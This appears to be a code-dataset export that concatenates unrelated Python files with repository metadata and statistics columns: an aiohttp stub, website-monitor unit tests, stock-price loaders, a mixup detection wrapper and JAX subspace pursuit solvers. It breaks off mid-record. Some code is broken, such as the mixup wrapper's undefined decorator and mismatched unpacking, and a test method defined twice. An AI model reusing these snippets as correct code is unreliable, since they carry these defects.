1418d4fa3c11aab91296ce28a17dabcdd29b76c1
|
[
"MIT"
] | 1
|
2020-11-17T09:08:24.000Z
|
2020-11-17T09:08:24.000Z
|
views.py
|
half2me/gst-web
|
1418d4fa3c11aab91296ce28a17dabcdd29b76c1
|
[
"MIT"
] | null | null | null |
views.py
|
half2me/gst-web
|
1418d4fa3c11aab91296ce28a17dabcdd29b76c1
|
[
"MIT"
] | 1
|
2020-11-17T09:08:26.000Z
|
2020-11-17T09:08:26.000Z
|
from aiohttp import web
from aiohttp.web import Application
def setup_view(app: Application):
pass
| 15
| 35
| 0.780952
| 15
| 105
| 5.4
| 0.666667
| 0.271605
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.171429
| 105
| 6
| 36
| 17.5
| 0.931034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
09b5cec93790bf62fd21ef460334e67d05dcfa27
| 16,932
|
py
|
Python
|
tests/test_producer.py
|
tannguyen1295/WebsitesMonitoring
|
0e25d34ce7609d2ca71e39854bd41521554c00c6
|
[
"Apache-2.0"
] | 1
|
2022-02-21T12:48:21.000Z
|
2022-02-21T12:48:21.000Z
|
tests/test_producer.py
|
tannguyen1295/WebsitesMonitoring
|
0e25d34ce7609d2ca71e39854bd41521554c00c6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_producer.py
|
tannguyen1295/WebsitesMonitoring
|
0e25d34ce7609d2ca71e39854bd41521554c00c6
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import datetime
from unittest import mock
from lib.producer import Producer
class TestWebsiteChecker(unittest.TestCase):
def setUp(self):
self.configs = {
"kafka_general": '''{
"service_uri": "",
"ca_path": "",
"cert_path": "",
"key_path": "",
"topic": ""
}''',
"kafka_producer": '''{
"request_timeout": 2
}'''
}
self.mock_logger = mock.Mock()
def _side_effect_for_send_request(self, website_1_mock_response, website_2_mock_response):
Producer._send_request = mock.Mock()
Producer._send_request.side_effect = [website_1_mock_response, website_2_mock_response]
def test_validateWebsites_normalCase_dataShouldBeParsedCorrectly(self):
website_1_mock_response = mock.Mock()
website_2_mock_response = mock.Mock()
self._side_effect_for_send_request(website_1_mock_response, website_2_mock_response)
website_1_url = "https://www.test1.com"
website_1_regex = "[a-zA-Z0-9]"
website_1_topic = "topic_1"
website_1_mock_response.status_code = 200
website_1_mock_response.text = "Website 1 value"
website_1_mock_response.elapsed = datetime.timedelta(microseconds=50000)
website_1_mock_response.headers = {"Date": "Sun, 06 Feb 2022 19:15:52 GMT"}
website_2_url = "https://www.test2.com"
website_2_regex = "[a-zA-Z0-9]"
website_2_topic = "topic_2"
website_2_mock_response.status_code = 200
website_2_mock_response.text = "Website 2 value"
website_2_mock_response.elapsed = datetime.timedelta(microseconds=20000)
website_2_mock_response.headers = {"Date": "Sun, 06 Feb 2022 20:15:52 GMT"}
websites = [
{
"url": website_1_url,
"regex": website_1_regex,
"topic": website_1_topic
},{
"url": website_2_url,
"regex": website_2_regex,
"topic": website_2_topic
}]
result = Producer(None, self.configs, self.mock_logger)._validate_websites(websites)
expected_result = [
{
"url": "https://www.test1.com",
"topic": "topic_1",
"status": {
"timestamp": "06-02-2022T17:15:52Z",
"response_time_in_millisecond": 50,
"status_code": 200,
"content_validation": {
"regex": "[a-zA-Z0-9]",
"content_matched": True
}
}
},{
"url": "https://www.test2.com",
"topic": "topic_2",
"status": {
"timestamp": "06-02-2022T18:15:52Z",
"response_time_in_millisecond": 20,
"status_code": 200,
"content_validation": {
"regex": "[a-zA-Z0-9]",
"content_matched": True
}
}
}
]
self.assertEqual(result, expected_result)
def test_validateWebsites_web2CannotBeReached_web2ResultShouldBeNone(self):
website_1_mock_response = mock.Mock()
website_2_mock_response = None
self._side_effect_for_send_request(website_1_mock_response, website_2_mock_response)
website_1_url = "https://www.test1.com"
website_1_regex = "[a-zA-Z0-9]"
website_1_topic = "topic_1"
website_1_mock_response.status_code = 200
website_1_mock_response.text = "Website 1 value"
website_1_mock_response.elapsed = datetime.timedelta(microseconds=50000)
website_1_mock_response.headers = {"Date": "Sun, 06 Feb 2022 19:15:52 GMT"}
website_2_url = "https://www.test2.com"
website_2_regex = "[a-zA-Z0-9]"
website_2_topic = "topic_2"
website_2_mock_response = None
websites = [
{
"url": website_1_url,
"regex": website_1_regex,
"topic": website_1_topic
},{
"url": website_2_url,
"regex": website_2_regex,
"topic": website_2_topic
}]
#timestamp will be autogenerated using datetime.now() if the response is None
result = Producer(None, self.configs, self.mock_logger)._validate_websites(websites)
del result[1]["status"]["timestamp"]
expected_result = [
{
"url": "https://www.test1.com",
"topic": "topic_1",
"status": {
"timestamp": "06-02-2022T17:15:52Z",
"response_time_in_millisecond": 50,
"status_code": 200,
"content_validation": {
"regex": "[a-zA-Z0-9]",
"content_matched": True
}
}
},{
"url": "https://www.test2.com",
"topic": "topic_2",
"status": {
"response_time_in_millisecond": None,
"status_code": None,
"content_validation": {
"regex": "[a-zA-Z0-9]",
"content_matched": None
}
}
}
]
self.assertEqual(result, expected_result)
def test_validateWebsite_web1RegexOnlyNumbers_web1ShouldNotMatch(self):
website_1_mock_response = mock.Mock()
website_2_mock_response = mock.Mock()
self._side_effect_for_send_request(website_1_mock_response, website_2_mock_response)
website_1_url = "https://www.test1.com"
website_1_regex = "[0-9]"
website_1_topic = "topic_1"
website_1_mock_response.status_code = 200
website_1_mock_response.text = "Website 1 value"
website_1_mock_response.elapsed = datetime.timedelta(microseconds=50000)
website_1_mock_response.headers = {"Date": "Sun, 06 Feb 2022 19:15:52 GMT"}
website_2_url = "https://www.test2.com"
website_2_regex = "[a-zA-Z0-9]"
website_2_topic = "topic_2"
website_2_mock_response.status_code = 200
website_2_mock_response.text = "Website 2 value"
website_2_mock_response.elapsed = datetime.timedelta(microseconds=20000)
website_2_mock_response.headers = {"Date": "Sun, 06 Feb 2022 20:15:52 GMT"}
websites = [
{
"url": website_1_url,
"regex": website_1_regex,
"topic": website_1_topic
},{
"url": website_2_url,
"regex": website_2_regex,
"topic": website_2_topic
}]
result = Producer(None, self.configs, self.mock_logger)._validate_websites(websites)
expected_result = [
{
"url": "https://www.test1.com",
"topic": "topic_1",
"status": {
"timestamp": "06-02-2022T17:15:52Z",
"response_time_in_millisecond": 50,
"status_code": 200,
"content_validation": {
"regex": "[0-9]",
"content_matched": False
}
}
},{
"url": "https://www.test2.com",
"topic": "topic_2",
"status": {
"timestamp": "06-02-2022T18:15:52Z",
"response_time_in_millisecond": 20,
"status_code": 200,
"content_validation": {
"regex": "[a-zA-Z0-9]",
"content_matched": True
}
}
}
]
self.assertEqual(result, expected_result)
def test_validateWebsite_web2RegexOnlyAlphabet_web2ShouldNotMatch(self):
website_1_mock_response = mock.Mock()
website_2_mock_response = mock.Mock()
self._side_effect_for_send_request(website_1_mock_response, website_2_mock_response)
website_1_url = "https://www.test1.com"
website_1_regex = "[a-zA-Z0-9]"
website_1_topic = "topic_1"
website_1_mock_response.status_code = 200
website_1_mock_response.text = "Website 1 value"
website_1_mock_response.elapsed = datetime.timedelta(microseconds=50000)
website_1_mock_response.headers = {"Date": "Sun, 06 Feb 2022 19:15:52 GMT"}
website_2_url = "https://www.test2.com"
website_2_regex = "[a-zA-Z]"
website_2_topic = "topic_2"
website_2_mock_response.status_code = 200
website_2_mock_response.text = "123"
website_2_mock_response.elapsed = datetime.timedelta(microseconds=20000)
website_2_mock_response.headers = {"Date": "Sun, 06 Feb 2022 20:15:52 GMT"}
websites = [
{
"url": website_1_url,
"regex": website_1_regex,
"topic": website_1_topic
},{
"url": website_2_url,
"regex": website_2_regex,
"topic": website_2_topic
}]
result = Producer(None, self.configs, self.mock_logger)._validate_websites(websites)
expected_result = [
{
"url": "https://www.test1.com",
"topic": "topic_1",
"status": {
"timestamp": "06-02-2022T17:15:52Z",
"response_time_in_millisecond": 50,
"status_code": 200,
"content_validation": {
"regex": "[a-zA-Z0-9]",
"content_matched": True
}
}
},{
"url": "https://www.test2.com",
"topic": "topic_2",
"status": {
"timestamp": "06-02-2022T18:15:52Z",
"response_time_in_millisecond": 20,
"status_code": 200,
"content_validation": {
"regex": "[a-zA-Z]",
"content_matched": False
}
}
}
]
self.assertEqual(result, expected_result)
def test_validateWebsite_web2PageNotFound_web2ShouldReturn404(self):
website_1_mock_response = mock.Mock()
website_2_mock_response = mock.Mock()
self._side_effect_for_send_request(website_1_mock_response, website_2_mock_response)
website_1_url = "https://www.test1.com"
website_1_regex = "[a-zA-Z0-9]"
website_1_topic = "topic_1"
website_1_mock_response.status_code = 200
website_1_mock_response.text = "Website 1 value"
website_1_mock_response.elapsed = datetime.timedelta(microseconds=50000)
website_1_mock_response.headers = {"Date": "Sun, 06 Feb 2022 19:15:52 GMT"}
website_2_url = "https://www.test2.com"
website_2_regex = "[a-zA-Z0-9]"
website_2_topic = "topic_2"
website_2_mock_response.status_code = 404
website_2_mock_response.text = "Page Not Found"
website_2_mock_response.elapsed = datetime.timedelta(microseconds=20000)
website_2_mock_response.headers = {"Date": "Sun, 06 Feb 2022 20:15:52 GMT"}
websites = [
{
"url": website_1_url,
"regex": website_1_regex,
"topic": website_1_topic
},{
"url": website_2_url,
"regex": website_2_regex,
"topic": website_2_topic
}]
result = Producer(None, self.configs, self.mock_logger)._validate_websites(websites)
expected_result = [
{
"url": "https://www.test1.com",
"topic": "topic_1",
"status": {
"timestamp": "06-02-2022T17:15:52Z",
"response_time_in_millisecond": 50,
"status_code": 200,
"content_validation": {
"regex": "[a-zA-Z0-9]",
"content_matched": True
}
}
},{
"url": "https://www.test2.com",
"topic": "topic_2",
"status": {
"timestamp": "06-02-2022T18:15:52Z",
"response_time_in_millisecond": 20,
"status_code": 404,
"content_validation": {
"regex": "[a-zA-Z0-9]",
"content_matched": True
}
}
}
]
self.assertEqual(result, expected_result)
def test_validateWebsite_web2PageNotFound_web2ShouldReturn404(self):
website_1_mock_response = mock.Mock()
website_2_mock_response = mock.Mock()
self._side_effect_for_send_request(website_1_mock_response, website_2_mock_response)
website_1_url = "https://www.test1.com"
website_1_regex = "[a-zA-Z0-9]"
website_1_topic = "topic_1"
website_1_mock_response.status_code = 200
website_1_mock_response.text = "Website 1 value"
website_1_mock_response.elapsed = datetime.timedelta(microseconds=50000)
website_1_mock_response.headers = {"Date": "Sun, 06 Feb 2022 19:15:52 GMT"}
website_2_url = "https://www.test2.com"
website_2_regex = "[0-9]"
website_2_topic = "topic_2"
website_2_mock_response.status_code = 404
website_2_mock_response.text = "Page Not Found"
website_2_mock_response.elapsed = datetime.timedelta(microseconds=20000)
website_2_mock_response.headers = {"Date": "Sun, 06 Feb 2022 20:15:52 GMT"}
websites = [
{
"url": website_1_url,
"regex": website_1_regex,
"topic": website_1_topic
},{
"url": website_2_url,
"regex": website_2_regex,
"topic": website_2_topic
}]
result = Producer(None, self.configs, self.mock_logger)._validate_websites(websites)
expected_result = [
{
"url": "https://www.test1.com",
"topic": "topic_1",
"status": {
"timestamp": "06-02-2022T17:15:52Z",
"response_time_in_millisecond": 50,
"status_code": 200,
"content_validation": {
"regex": "[a-zA-Z0-9]",
"content_matched": True
}
}
},{
"url": "https://www.test2.com",
"topic": "topic_2",
"status": {
"timestamp": "06-02-2022T18:15:52Z",
"response_time_in_millisecond": 20,
"status_code": 404,
"content_validation": {
"regex": "[0-9]",
"content_matched": False
}
}
}
]
self.assertEqual(result, expected_result)
def test_prepareDataForKafka_normalCase_dataShouldContainUrlAndStatusOnly(self):
website_data = {
"url": "https://www.test1.com",
"topic": "topic_1",
"status": {
"timestamp": "06-02-2022T17:15:52Z",
"response_time_in_millisecond": 50,
"status_code": 200,
"content_validation": {
"regex": "[a-zA-Z0-9]",
"content_matched": True
}
}
}
result = Producer(None, self.configs, self.mock_logger)._prepare_data_for_kafka(website_data)
expected_result = {
"url": "https://www.test1.com",
"status": {
"timestamp": "06-02-2022T17:15:52Z",
"response_time_in_millisecond": 50,
"status_code": 200,
"content_validation": {
"regex": "[a-zA-Z0-9]",
"content_matched": True
}
}
}
self.assertEqual(result, expected_result)
if __name__ == '__main__':
unittest.main()
| 38.221219
| 101
| 0.507973
| 1,668
| 16,932
| 4.797362
| 0.072542
| 0.07998
| 0.056986
| 0.094976
| 0.904649
| 0.90015
| 0.90015
| 0.896026
| 0.870657
| 0.865409
| 0
| 0.070976
| 0.384243
| 16,932
| 442
| 102
| 38.307692
| 0.696528
| 0.004489
| 0
| 0.757033
| 0
| 0
| 0.211985
| 0.023257
| 0
| 0
| 0
| 0
| 0.017903
| 1
| 0.023018
| false
| 0
| 0.01023
| 0
| 0.035806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
61fc132c1d80986b0b7011b1d49bcc32365669b4
| 1,108
|
py
|
Python
|
processor/_load_intraday.py
|
WencaiZheng/TwitterAnalysisWithEarnings
|
0e085e59353eb570d34b9f3034433b5657644916
|
[
"MIT"
] | 4
|
2020-06-29T19:47:07.000Z
|
2021-04-22T03:04:31.000Z
|
processor/_load_intraday.py
|
WencaiZheng/TwitterAnalysisWithEarnings
|
0e085e59353eb570d34b9f3034433b5657644916
|
[
"MIT"
] | null | null | null |
processor/_load_intraday.py
|
WencaiZheng/TwitterAnalysisWithEarnings
|
0e085e59353eb570d34b9f3034433b5657644916
|
[
"MIT"
] | 2
|
2020-05-30T01:57:41.000Z
|
2020-09-11T11:07:27.000Z
|
import pandas as pd
save_path = 'data\\stock_data\\'
def get_hourly_price(ticker):
# intraday data from wrds TAQ
print(f"Processing intraday price for {ticker}")
stock_price = pd.read_csv(f'{save_path}{ticker}.csv')
stock_price = stock_price[stock_price.SYM_SUFFIX.isna()]
stock_price.index = pd.to_datetime(stock_price.DATE.astype(str) + ' ' + stock_price.TIME_M.astype(str))
# group by hour
hourly_ohlc=stock_price['PRICE'].resample('1H').ohlc()
hourly_ohlc['volume'] = stock_price.SIZE.resample('1H').sum()
return hourly_ohlc
def get_hourly_ratio(ticker):
# intraday data from wrds TAQ
print(f"Processing intraday price for {ticker}")
stock_price = pd.read_csv(f'{save_path}{ticker}.csv')
stock_price = stock_price[stock_price.SYM_SUFFIX.isna()]
stock_price.index = pd.to_datetime(stock_price.DATE.astype(str) + ' ' + stock_price.TIME_M.astype(str))
# group by hour
hourly=stock_price['PRICE'].resample('1H').mean()
hourly_r = hourly/hourly.iloc[0]
# hourly_r['volume'] = stock_price.SIZE.resample('1H').sum()
return hourly_r
| 41.037037
| 107
| 0.708484
| 166
| 1,108
| 4.487952
| 0.295181
| 0.241611
| 0.080537
| 0.107383
| 0.826846
| 0.759732
| 0.759732
| 0.759732
| 0.759732
| 0.638926
| 0
| 0.005297
| 0.148014
| 1,108
| 27
| 108
| 41.037037
| 0.783898
| 0.128159
| 0
| 0.444444
| 0
| 0
| 0.170833
| 0.047917
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.055556
| 0
| 0.277778
| 0.111111
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
110775727526137e5f9af7a85619f6e268b9cdbd
| 5,008
|
py
|
Python
|
maskrcnn_benchmark/data/datasets/mixup.py
|
microsoft/GLIP
|
fd52c6361f013e70ae7682d90b3ab3ca2bd5e6bc
|
[
"MIT"
] | 295
|
2021-12-08T02:22:27.000Z
|
2022-03-31T22:27:10.000Z
|
maskrcnn_benchmark/data/datasets/mixup.py
|
microsoft/GLIP
|
fd52c6361f013e70ae7682d90b3ab3ca2bd5e6bc
|
[
"MIT"
] | 1
|
2021-12-14T08:09:13.000Z
|
2022-03-17T03:53:19.000Z
|
maskrcnn_benchmark/data/datasets/mixup.py
|
microsoft/GLIP
|
fd52c6361f013e70ae7682d90b3ab3ca2bd5e6bc
|
[
"MIT"
] | 9
|
2021-12-09T00:33:25.000Z
|
2022-03-17T11:57:42.000Z
|
"""Mixup detection dataset wrapper."""
from __future__ import absolute_import
import numpy as np
import torch
import torch.utils.data as data
class MixupDetection(data.Dataset):
"""Detection dataset wrapper that performs mixup for normal dataset.
Parameters
----------
dataset : mx.gluon.data.Dataset
Gluon dataset object.
mixup : callable random generator, e.g. np.random.uniform
A random mixup ratio sampler, preferably a random generator from numpy.random
A random float will be sampled each time with mixup(*args).
Use None to disable.
*args : list
Additional arguments for mixup random sampler.
"""
def __init__(self, dataset, mixup=None, preproc=None, *args):
super().__init__(dataset.input_dim)
self._dataset = dataset
self.preproc = preproc
self._mixup = mixup
self._mixup_args = args
def set_mixup(self, mixup=None, *args):
"""Set mixup random sampler, use None to disable.
Parameters
----------
mixup : callable random generator, e.g. np.random.uniform
A random mixup ratio sampler, preferably a random generator from numpy.random
A random float will be sampled each time with mixup(*args)
*args : list
Additional arguments for mixup random sampler.
"""
self._mixup = mixup
self._mixup_args = args
def __len__(self):
return len(self._dataset)
@Dataset.resize_getitem
def __getitem__(self, idx):
self._dataset._input_dim = self.input_dim
# first image
img1, label1, _, _= self._dataset.pull_item(idx)
lambd = 1
# draw a random lambda ratio from distribution
if self._mixup is not None:
lambd = max(0, min(1, self._mixup(*self._mixup_args)))
if lambd >= 1:
weights1 = np.ones((label1.shape[0], 1))
label1 = np.hstack((label1, weights1))
height, width, _ = img1.shape
img_info = (width, height)
if self.preproc is not None:
img_o, target_o = self.preproc(img1, label1, self.input_dim)
return img_o, target_o, img_info, idx
# second image
idx2 = int(np.random.choice(np.delete(np.arange(len(self)), idx)))
img2, label2, _, _ = self._dataset.pull_item(idx2)
# mixup two images
height = max(img1.shape[0], img2.shape[0])
width = max(img1.shape[1], img2.shape[1])
mix_img = np.zeros((height, width, 3),dtype=np.float32)
mix_img[:img1.shape[0], :img1.shape[1], :] = img1.astype(np.float32) * lambd
mix_img[:img2.shape[0], :img2.shape[1], :] += img2.astype(np.float32) * (1. - lambd)
mix_img = mix_img.astype(np.uint8)
y1 = np.hstack((label1, np.full((label1.shape[0], 1), lambd)))
y2 = np.hstack((label2, np.full((label2.shape[0], 1), 1. - lambd)))
mix_label = np.vstack((y1, y2))
if self.preproc is not None:
mix_img, padded_labels = self.preproc(mix_img, mix_label, self.input_dim)
img_info = (width, height)
return mix_img, padded_labels, img_info , idx
def pull_item(self, idx):
self._dataset._input_dim = self.input_dim
# first image
img1, label1, _, _= self._dataset.pull_item(idx)
lambd = 1
# draw a random lambda ratio from distribution
if self._mixup is not None:
lambd = max(0, min(1, self._mixup(*self._mixup_args)))
if lambd >= 1:
weights1 = np.ones((label1.shape[0], 1))
label1 = np.hstack((label1, weights1))
height, width, _ = img1.shape
img_info = (width, height)
if self.preproc is not None:
img_o, target_o = self.preproc(img1, label1, self.input_dim)
return img_o, target_o, img_info, idx
# second image
idx2 = int(np.random.choice(np.delete(np.arange(len(self)), idx)))
img2, label2 = self._dataset.pull_item(idx2)
# mixup two images
height = max(img1.shape[0], img2.shape[0])
width = max(img1.shape[1], img2.shape[1])
mix_img = np.zeros((height, width, 3),dtype=np.float32)
mix_img[:img1.shape[0], :img1.shape[1], :] = img1.astype(np.float32) * lambd
mix_img[:img2.shape[0], :img2.shape[1], :] += img2.astype(np.float32) * (1. - lambd)
mix_img = mix_img.astype(np.uint8)
y1 = np.hstack((label1, np.full((label1.shape[0], 1), lambd)))
y2 = np.hstack((label2, np.full((label2.shape[0], 1), 1. - lambd)))
mix_label = np.vstack((y1, y2))
if self.preproc is not None:
mix_img, padded_labels = self.preproc(mix_img, mix_label, self.input_dim)
img_info = (width, height)
return mix_img, padded_labels, img_info , idx
| 40.064
| 93
| 0.589457
| 662
| 5,008
| 4.294562
| 0.170695
| 0.033767
| 0.025325
| 0.025325
| 0.821667
| 0.821667
| 0.821667
| 0.821667
| 0.763982
| 0.763982
| 0
| 0.033765
| 0.290335
| 5,008
| 124
| 94
| 40.387097
| 0.766179
| 0.196086
| 0
| 0.773333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.053333
| 0.013333
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1160ab753e9d3b321e08767d2e36bfc9563a0c01
| 46
|
py
|
Python
|
lf3py/i18n/__init__.py
|
rog-works/lf3py
|
e89937f7aa133ed54d85764f06101ab9abf6b960
|
[
"CNRI-Python"
] | null | null | null |
lf3py/i18n/__init__.py
|
rog-works/lf3py
|
e89937f7aa133ed54d85764f06101ab9abf6b960
|
[
"CNRI-Python"
] | 48
|
2020-12-19T13:47:26.000Z
|
2021-01-07T22:27:56.000Z
|
lf3py/i18n/__init__.py
|
rog-works/lf3py
|
e89937f7aa133ed54d85764f06101ab9abf6b960
|
[
"CNRI-Python"
] | null | null | null |
from lf3py.i18n.i18n import I18n # noqa F401
| 23
| 45
| 0.76087
| 8
| 46
| 4.375
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.263158
| 0.173913
| 46
| 1
| 46
| 46
| 0.657895
| 0.195652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fecbb2dd06f2428ce913b67df269d56c82845228
| 6,549
|
py
|
Python
|
src/cr/sparse/_src/pursuit/sp.py
|
carnot-shailesh/cr-sparse
|
989ebead8a8ac37ade643093e1caa31ae2a3eda1
|
[
"Apache-2.0"
] | 42
|
2021-06-11T17:11:29.000Z
|
2022-03-29T11:51:44.000Z
|
src/cr/sparse/_src/pursuit/sp.py
|
carnot-shailesh/cr-sparse
|
989ebead8a8ac37ade643093e1caa31ae2a3eda1
|
[
"Apache-2.0"
] | 19
|
2021-06-04T11:36:11.000Z
|
2022-01-22T20:13:39.000Z
|
src/cr/sparse/_src/pursuit/sp.py
|
carnot-shailesh/cr-sparse
|
989ebead8a8ac37ade643093e1caa31ae2a3eda1
|
[
"Apache-2.0"
] | 5
|
2021-11-21T21:01:11.000Z
|
2022-02-28T07:20:03.000Z
|
# Copyright 2021 CR.Sparse Development Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import jax.numpy as jnp
from jax import vmap, jit, lax
from .defs import RecoverySolution
from cr.sparse import largest_indices
def matrix_solve(Phi, y, K, max_iters=None, res_norm_rtol=1e-4):
"""Solves the sparse recovery problem :math:`y = \Phi x + e` using Subspace Pursuit for matrices
"""
## Initialize some constants for the algorithm
M, N = Phi.shape
# squared norm of the signal
y_norm_sqr = y.T @ y
max_r_norm_sqr = y_norm_sqr * (res_norm_rtol ** 2)
if max_iters is None:
max_iters = M
def init():
# compute the correlations of atoms with signal y
h = Phi.T @ y
# Pick largest K indices [this is first iteration]
I = largest_indices(h, K)
# Pick corresponding atoms to form the K wide subdictionary
Phi_I = Phi[:, I]
# Solve least squares over the selected indices
x_I, r_I_norms, rank_I, s_I = jnp.linalg.lstsq(Phi_I, y)
# Compute new residual
r = y - Phi_I @ x_I
# Compute residual norm squared
r_norm_sqr = r.T @ r
# Assemble the algorithm state at the end of first iteration
return RecoverySolution(x_I=x_I, I=I, r=r, r_norm_sqr=r_norm_sqr, iterations=1)
def body(state):
# compute the correlations of dictionary atoms with the residual
h = Phi.T @ state.r
# Ignore the previously selected atoms
h = h.at[state.I].set(0)
# Pick largest K indices
I_new = largest_indices(h, K)
# Combine with previous K indices to form a set of 2K indices
I_2k = jnp.hstack((state.I, I_new))
# Pick corresponding atoms to form the 2K wide subdictionary
Phi_2I = Phi[:, I_2k]
# Solve least squares over the selected 2K indices
x_p, r_p_norms, rank_p, s_p = jnp.linalg.lstsq(Phi_2I, y)
# pick the K largest indices
Ia = largest_indices(x_p, K)
# Identify indices for corresponding atoms
I = I_2k[Ia]
# TODO consider how we can exploit the guess for x_I
# # Corresponding non-zero entries in the sparse approximation
# x_I = x_p[Ia]
# Form the subdictionary of corresponding atoms
Phi_I = Phi[:, I]
# Solve least squares over the selected K indices
x_I, r_I_norms, rank_I, s_I = jnp.linalg.lstsq(Phi_I, y)
# Compute new residual
r = y - Phi_I @ x_I
# Compute residual norm squared
r_norm_sqr = r.T @ r
return RecoverySolution(x_I=x_I, I=I, r=r, r_norm_sqr=r_norm_sqr, iterations=state.iterations+1)
def cond(state):
# limit on residual norm
a = state.r_norm_sqr > max_r_norm_sqr
# limit on number of iterations
b = state.iterations < max_iters
c = jnp.logical_and(a, b)
return c
state = lax.while_loop(cond, body, init())
return state
matrix_solve_jit = jit(matrix_solve, static_argnums=(2), static_argnames=("step_size", "max_iters", "res_norm_rtol"))
def operator_solve(Phi, y, K, max_iters=None, res_norm_rtol=1e-4):
"""Solves the sparse recovery problem :math:`y = \Phi x + e` using Subspace Pursuit for linear operators
"""
trans = Phi.trans
## Initialize some constants for the algorithm
M = y.shape[0]
# squared norm of the signal
y_norm_sqr = y.T @ y
max_r_norm_sqr = y_norm_sqr * (res_norm_rtol ** 2)
if max_iters is None:
max_iters = M
def init():
# compute the correlations of atoms with signal y
h = trans(y)
# Pick largest K indices [this is first iteration]
I = largest_indices(h, K)
# Pick corresponding atoms to form the K wide subdictionary
Phi_I = Phi.columns(I)
# Solve least squares over the selected indices
x_I, r_I_norms, rank_I, s_I = jnp.linalg.lstsq(Phi_I, y)
# Compute new residual
r = y - Phi_I @ x_I
# Compute residual norm squared
r_norm_sqr = r.T @ r
# Assemble the algorithm state at the end of first iteration
return RecoverySolution(x_I=x_I, I=I, r=r, r_norm_sqr=r_norm_sqr, iterations=1)
def body(state):
# compute the correlations of dictionary atoms with the residual
h = trans(state.r)
# Ignore the previously selected atoms
h = h.at[state.I].set(0)
# Pick largest K indices
I_new = largest_indices(h, K)
# Combine with previous K indices to form a set of 2K indices
I_2k = jnp.hstack((state.I, I_new))
# Pick corresponding atoms to form the 2K wide subdictionary
Phi_2I = Phi.columns(I_2k)
# Solve least squares over the selected 2K indices
x_p, r_p_norms, rank_p, s_p = jnp.linalg.lstsq(Phi_2I, y)
# pick the K largest indices
Ia = largest_indices(x_p, K)
# Identify indices for corresponding atoms
I = I_2k[Ia]
# TODO consider how we can exploit the guess for x_I
# # Corresponding non-zero entries in the sparse approximation
# x_I = x_p[Ia]
# Form the subdictionary of corresponding atoms
Phi_I = Phi.columns(I)
# Solve least squares over the selected K indices
x_I, r_I_norms, rank_I, s_I = jnp.linalg.lstsq(Phi_I, y)
# Compute new residual
r = y - Phi_I @ x_I
# Compute residual norm squared
r_norm_sqr = r.T @ r
return RecoverySolution(x_I=x_I, I=I, r=r, r_norm_sqr=r_norm_sqr, iterations=state.iterations+1)
def cond(state):
# limit on residual norm
a = state.r_norm_sqr > max_r_norm_sqr
# limit on number of iterations
b = state.iterations < max_iters
c = jnp.logical_and(a, b)
return c
state = lax.while_loop(cond, body, init())
return state
operator_solve_jit = jit(operator_solve, static_argnums=(0, 2), static_argnames=("step_size", "max_iters", "res_norm_rtol"))
solve = operator_solve_jit
| 37.855491
| 124
| 0.64758
| 1,025
| 6,549
| 3.96878
| 0.181463
| 0.037856
| 0.035398
| 0.017699
| 0.812684
| 0.812684
| 0.812684
| 0.79351
| 0.79351
| 0.79351
| 0
| 0.008414
| 0.274088
| 6,549
| 172
| 125
| 38.075581
| 0.847287
| 0.442968
| 0
| 0.769231
| 0
| 0
| 0.017372
| 0
| 0
| 0
| 0
| 0.011628
| 0
| 1
| 0.102564
| false
| 0
| 0.051282
| 0
| 0.25641
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fed1bf6c9fbcbc3b09508c88b29ec39d21f5f517
| 63
|
py
|
Python
|
problem_016.py
|
wurfkeks/project-euler
|
782c459546ae0d98ce20ce0bbcde3fed3adaab06
|
[
